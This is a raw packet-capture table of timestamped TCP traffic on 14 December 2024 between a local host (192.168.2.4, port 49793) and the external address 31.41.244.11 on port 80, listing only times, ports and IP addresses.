Dec 14, 2024 23:58:19.755618095 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.755729914 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.755856991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.757050991 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.757102966 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.757178068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.757225990 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.758513927 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.758569956 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.758636951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.758685112 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.760009050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.760075092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.760148048 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.760204077 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.761506081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.761562109 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.761764050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.761815071 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.762944937 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.762995958 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.763077021 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.763223886 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.764431000 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.764488935 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.764575958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.764631987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.765882969 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.765938044 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.875917912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.875988960 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.876005888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.876070023 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.876288891 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.876348972 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.876542091 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.876600981 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.877489090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.877545118 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.877553940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.877588034 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.878484011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.878541946 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.878623962 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.878681898 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.879848003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.879905939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.879951954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.880119085 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.880842924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.880892992 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.880950928 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.881011009 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.881954908 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.882014036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.882081985 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.882143974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.883089066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.883142948 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.883232117 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.883296967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.884223938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.884314060 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.884409904 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.884474993 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.885390997 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.885447025 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.885509014 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.885561943 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.886498928 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.886553049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.886621952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.886689901 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.887562037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.887619972 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.887689114 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.887738943 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.888668060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.888778925 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.888806105 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.888870001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.889760971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.889813900 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.889882088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.889942884 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.890861988 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.890914917 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.890995979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.891062021 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.891957998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.892035007 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.892103910 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.892198086 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.893069983 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.893137932 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.893197060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.893253088 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.894263983 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.894390106 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.894404888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.894437075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.895242929 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.895334959 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.895389080 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.895443916 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.896352053 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.896430969 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.896517992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.896590948 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.897480965 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.897555113 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.897613049 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.897665977 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.898550034 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.898652077 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.898658991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.898698092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.899692059 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.899760008 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.899799109 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.899981022 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.900748968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.900819063 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.900881052 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.900939941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.901839018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.901896000 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.901963949 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.902012110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.902947903 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.903003931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.903089046 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.903136969 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.904046059 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.904100895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.904210091 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.904267073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.905169964 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.905225039 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.905249119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.905308962 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.906246901 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.906302929 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.906338930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.906383991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.907375097 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.907475948 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.907516003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.907573938 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.908432007 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.908485889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.908552885 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.908607006 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.909508944 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.909591913 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.909661055 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.909825087 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.910650015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.910706043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.910840988 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.910892963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.911708117 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.911765099 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.911936998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.911988020 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.912805080 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.912858963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.912926912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.912977934 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.913933039 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.913989067 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.914021969 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.914093971 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.915010929 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.915080070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.915126085 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.915178061 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.916093111 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.916146040 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.916251898 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.916304111 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.917215109 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.917314053 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.917351961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.917402983 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.918314934 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.918380022 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.918462992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.918515921 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.919400930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.919450998 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.919533968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.919584990 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.920481920 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.920532942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.920602083 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.920655012 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.921583891 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.921633959 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.921715021 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.921766043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.922709942 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.922765970 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.922832966 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.922895908 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.923826933 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.923922062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.923938990 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.923966885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.924900055 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.924953938 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.925019026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.925071001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.925980091 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.926034927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.926101923 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.926179886 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.927061081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.927190065 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.927191973 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.927301884 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.928172112 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.928230047 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.928291082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.928342104 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.929269075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.929328918 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.929399014 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.929451942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.930358887 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.930413961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.930483103 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.930536985 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.931449890 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.931505919 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.931579113 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.931632042 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.932563066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.932648897 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.932697058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.932748079 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.933686018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.933747053 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.068268061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.068329096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.068403959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.068489075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.068763018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.068820000 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.069081068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.069298983 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.069894075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.069968939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.070055008 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.070220947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.070997000 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.071064949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.071132898 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.071310997 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.072099924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.072173119 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.072242022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.072289944 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.073170900 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.073235035 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.073319912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.073415041 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.074316025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.074443102 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.074445963 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.074877024 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.075373888 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.075440884 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.075509071 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.075628042 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.076455116 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.076514959 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.076601028 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.076865911 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.077615023 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.077737093 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.077794075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.078690052 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.078737974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.078824043 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.078881025 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.079786062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.079848051 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.079921007 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.080002069 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.080847025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.080920935 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.081005096 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.081109047 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.081959963 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.082030058 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.082098961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.082146883 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.083045959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.083106041 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.083188057 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.083235979 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.084140062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.084208012 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.084290981 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.084358931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.085393906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.085517883 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.085576057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.086375952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.086523056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.086580992 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.087430954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.087599039 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.087658882 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.088622093 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.088746071 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.088807106 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.089637995 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.089878082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.089937925 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.090729952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.090781927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.090863943 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.090909004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.091857910 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.091913939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.092113018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.092521906 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.092901945 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.092958927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.093050957 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.093117952 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.094005108 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.094060898 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.094177961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.094232082 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.095170975 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.095221996 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.095257044 CET	80	49793	31.41.244.11	192.168.2.4
